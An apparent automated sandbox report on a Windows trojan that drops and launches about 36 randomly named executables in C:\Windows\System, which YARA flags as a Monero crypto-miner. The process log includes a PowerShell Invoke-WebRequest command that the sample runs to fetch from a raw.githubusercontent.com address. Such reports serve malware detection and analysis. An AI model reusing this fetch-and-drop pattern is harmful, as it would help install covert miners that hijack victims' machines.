Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB8CA70	7_2_00007FF6BEB8CA70
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB8E270	7_2_00007FF6BEB8E270
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEB75A70	7_2_00007FF6BEB75A70
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3CECD10	8_2_00007FF6B3CECD10
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3CEDD10	8_2_00007FF6B3CEDD10
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3DD5520	8_2_00007FF6B3DD5520
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3DCE520	8_2_00007FF6B3DCE520
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3DA9D30	8_2_00007FF6B3DA9D30
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3D01500	8_2_00007FF6B3D01500
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3D00530	8_2_00007FF6B3D00530
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3DABD10	8_2_00007FF6B3DABD10
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3D334B4	8_2_00007FF6B3D334B4

Yara signature match

Source: 38.2.xNhRSWh.exe.7ff699c10000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 17.2.MwFvbxc.exe.7ff7dc870000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 19.2.oxCQuSo.exe.7ff6c9f90000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 7.2.uxMRJKa.exe.7ff6bea80000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 13.2.bzSbRdi.exe.7ff7777f0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 39.2.jtnQpnb.exe.7ff7a86e0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 25.2.VHwkuIa.exe.7ff781ee0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 30.2.FGSooXz.exe.7ff654030000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 12.2.imwRXsl.exe.7ff74df50000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 6.2.wHnuprt.exe.7ff7c3b50000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 14.2.Csmwgyb.exe.7ff7b8680000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 37.2.ZTSJHKb.exe.7ff725c00000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 5.2.ERbKWDm.exe.7ff67dbc0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 32.2.nWSykjl.exe.7ff77c770000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 40.2.hEUEsIC.exe.7ff61c860000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 9.2.wkazDeV.exe.7ff68b300000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 20.2.vyHGCnK.exe.7ff6acaf0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 41.2.UqXZtcb.exe.7ff7bbf70000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 24.2.eVVPPqR.exe.7ff6e04e0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 4.2.xIpouRJ.exe.7ff6667f0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 26.2.WLWcTVM.exe.7ff6a8db0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 35.2.tyQdqmC.exe.7ff60fc20000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 11.2.wJNkgSa.exe.7ff700a70000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 31.2.mKdsHiQ.exe.7ff757760000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 15.2.defQfgC.exe.7ff6888b0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 10.2.VWrcuzM.exe.7ff748320000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 22.2.VFkciqc.exe.7ff602990000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 16.2.XZxtJFw.exe.7ff7a5920000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 27.2.WCbcoxD.exe.7ff7b66f0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 34.2.iHSYLud.exe.7ff7683d0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 29.2.fpHmIIc.exe.7ff6377f0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 28.2.QWtCxan.exe.7ff670a00000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 8.2.bJVoOik.exe.7ff6b3cd0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 18.2.hAOVVjq.exe.7ff77b680000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 36.2.sabRErB.exe.7ff795f20000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 33.2.LKurWpq.exe.7ff650b90000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.mbSqRHL.exe.7ff62c3e0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 23.2.sdTevgk.exe.7ff601280000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@4779/516@4/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dark-9c5b7a476542[1].css

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_03
Source: C:\Users\user\Desktop\file.exe	Mutant created: \Sessions\1\BaseNamedObjects\sfdkjjhgkdsfhgjkjjsd

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvboery0.1r2.ps1

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 92%

Source: xIpouRJ.exe	String found in binary or memory: --help
Source: xIpouRJ.exe	String found in binary or memory: --help
Source: ERbKWDm.exe	String found in binary or memory: --help
Source: ERbKWDm.exe	String found in binary or memory: --help
Source: wHnuprt.exe	String found in binary or memory: --help
Source: wHnuprt.exe	String found in binary or memory: --help
Source: uxMRJKa.exe	String found in binary or memory: --help
Source: uxMRJKa.exe	String found in binary or memory: --help
Source: bJVoOik.exe	String found in binary or memory: --help
Source: bJVoOik.exe	String found in binary or memory: --help
Source: wkazDeV.exe	String found in binary or memory: --help
Source: wkazDeV.exe	String found in binary or memory: --help
Source: VWrcuzM.exe	String found in binary or memory: --help
Source: VWrcuzM.exe	String found in binary or memory: --help

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\xIpouRJ.exe C:\Windows\System\xIpouRJ.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\ERbKWDm.exe C:\Windows\System\ERbKWDm.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\wHnuprt.exe C:\Windows\System\wHnuprt.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\uxMRJKa.exe C:\Windows\System\uxMRJKa.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\bJVoOik.exe C:\Windows\System\bJVoOik.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\wkazDeV.exe C:\Windows\System\wkazDeV.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\VWrcuzM.exe C:\Windows\System\VWrcuzM.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\wJNkgSa.exe C:\Windows\System\wJNkgSa.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\imwRXsl.exe C:\Windows\System\imwRXsl.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\bzSbRdi.exe C:\Windows\System\bzSbRdi.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\Csmwgyb.exe C:\Windows\System\Csmwgyb.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\defQfgC.exe C:\Windows\System\defQfgC.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\XZxtJFw.exe C:\Windows\System\XZxtJFw.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\MwFvbxc.exe C:\Windows\System\MwFvbxc.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\hAOVVjq.exe C:\Windows\System\hAOVVjq.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\oxCQuSo.exe C:\Windows\System\oxCQuSo.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\vyHGCnK.exe C:\Windows\System\vyHGCnK.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\mbSqRHL.exe C:\Windows\System\mbSqRHL.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\VFkciqc.exe C:\Windows\System\VFkciqc.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\sdTevgk.exe C:\Windows\System\sdTevgk.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\eVVPPqR.exe C:\Windows\System\eVVPPqR.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\VHwkuIa.exe C:\Windows\System\VHwkuIa.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\WLWcTVM.exe C:\Windows\System\WLWcTVM.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\WCbcoxD.exe C:\Windows\System\WCbcoxD.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\QWtCxan.exe C:\Windows\System\QWtCxan.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\fpHmIIc.exe C:\Windows\System\fpHmIIc.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\FGSooXz.exe C:\Windows\System\FGSooXz.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\mKdsHiQ.exe C:\Windows\System\mKdsHiQ.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\nWSykjl.exe C:\Windows\System\nWSykjl.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\LKurWpq.exe C:\Windows\System\LKurWpq.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\iHSYLud.exe C:\Windows\System\iHSYLud.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\tyQdqmC.exe C:\Windows\System\tyQdqmC.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\sabRErB.exe C:\Windows\System\sabRErB.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\ZTSJHKb.exe C:\Windows\System\ZTSJHKb.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\xNhRSWh.exe C:\Windows\System\xNhRSWh.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\jtnQpnb.exe C:\Windows\System\jtnQpnb.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\hEUEsIC.exe C:\Windows\System\hEUEsIC.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\UqXZtcb.exe C:\Windows\System\UqXZtcb.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\xIpouRJ.exe C:\Windows\System\xIpouRJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\ERbKWDm.exe C:\Windows\System\ERbKWDm.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\wHnuprt.exe C:\Windows\System\wHnuprt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\uxMRJKa.exe C:\Windows\System\uxMRJKa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\bJVoOik.exe C:\Windows\System\bJVoOik.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\wkazDeV.exe C:\Windows\System\wkazDeV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\VWrcuzM.exe C:\Windows\System\VWrcuzM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\wJNkgSa.exe C:\Windows\System\wJNkgSa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\imwRXsl.exe C:\Windows\System\imwRXsl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\bzSbRdi.exe C:\Windows\System\bzSbRdi.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\Csmwgyb.exe C:\Windows\System\Csmwgyb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\defQfgC.exe C:\Windows\System\defQfgC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\XZxtJFw.exe C:\Windows\System\XZxtJFw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\MwFvbxc.exe C:\Windows\System\MwFvbxc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\hAOVVjq.exe C:\Windows\System\hAOVVjq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\oxCQuSo.exe C:\Windows\System\oxCQuSo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\vyHGCnK.exe C:\Windows\System\vyHGCnK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\mbSqRHL.exe C:\Windows\System\mbSqRHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\VFkciqc.exe C:\Windows\System\VFkciqc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\sdTevgk.exe C:\Windows\System\sdTevgk.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\eVVPPqR.exe C:\Windows\System\eVVPPqR.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\VHwkuIa.exe C:\Windows\System\VHwkuIa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\WLWcTVM.exe C:\Windows\System\WLWcTVM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\WCbcoxD.exe C:\Windows\System\WCbcoxD.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\QWtCxan.exe C:\Windows\System\QWtCxan.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\fpHmIIc.exe C:\Windows\System\fpHmIIc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\FGSooXz.exe C:\Windows\System\FGSooXz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\mKdsHiQ.exe C:\Windows\System\mKdsHiQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\nWSykjl.exe C:\Windows\System\nWSykjl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\LKurWpq.exe C:\Windows\System\LKurWpq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\iHSYLud.exe C:\Windows\System\iHSYLud.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\tyQdqmC.exe C:\Windows\System\tyQdqmC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\sabRErB.exe C:\Windows\System\sabRErB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\ZTSJHKb.exe C:\Windows\System\ZTSJHKb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\xNhRSWh.exe C:\Windows\System\xNhRSWh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\jtnQpnb.exe C:\Windows\System\jtnQpnb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\hEUEsIC.exe C:\Windows\System\hEUEsIC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\UqXZtcb.exe C:\Windows\System\UqXZtcb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
